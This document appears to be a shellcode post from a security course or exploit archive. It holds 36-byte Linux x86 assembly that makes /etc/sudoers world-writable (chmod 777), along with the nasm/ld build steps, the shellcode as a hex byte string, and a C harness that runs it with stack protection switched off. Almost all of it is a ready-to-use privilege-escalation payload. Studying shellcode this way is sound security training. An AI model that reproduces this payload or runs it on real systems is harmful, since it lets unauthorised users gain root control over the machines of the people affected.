Linux/x86 chmod 777 /etc/sudoers Shellcode (36 bytes)

/*
################## Description ####################
; Title   : chmod 777 /etc/sudoers - Shellcode
; Author  : Hashim Jawad
; Website : ihack4falafel[.]com
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : chmod /etc/sudoers permissions
; OS      : Linux
; Arch    : x86
; Size    : 36 bytes
################### chmod.nasm #####################
global _start
section .text
_start:
        ; push NULL into stack
        xor edx, edx
        push edx
  ; push (/etc/sudoers) into stack
  push 0x7372656f
  push 0x6475732f
  push 0x6374652f
  ; store ESP pointer in EBX
  mov ebx, esp
        ; store octal value of (777) in CX
        mov cx, 0x1ff
  ; execute __NR_chmod syscall
        xor eax, eax
        mov al, 0xf
  int 0x80
  ; execute __NR_exit syscall
  xor eax, eax
  mov al,0x1
  int 0x80
################### chmod binary #####################
nasm -f elf32 -o chmod.o chmod.nasm
ld -z execstack -o chmod chmod.o
################### Shellcode ########################
objdump -d chmod -M intel
##################  Compile  #########################
gcc -fno-stack-protector -z execstack chmod.c -o chmod
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xd2\x52\x68\x6f\x65\x72\x73\x68\x2f\x73\x75\x64\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\xff\x01\x31\xc0\xb0\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
main()
{
  printf("Shellcode Length:  %d\n", strlen(code));
  int (*ret)() = (int(*)())code;
  ret();
}

 

Leave a Reply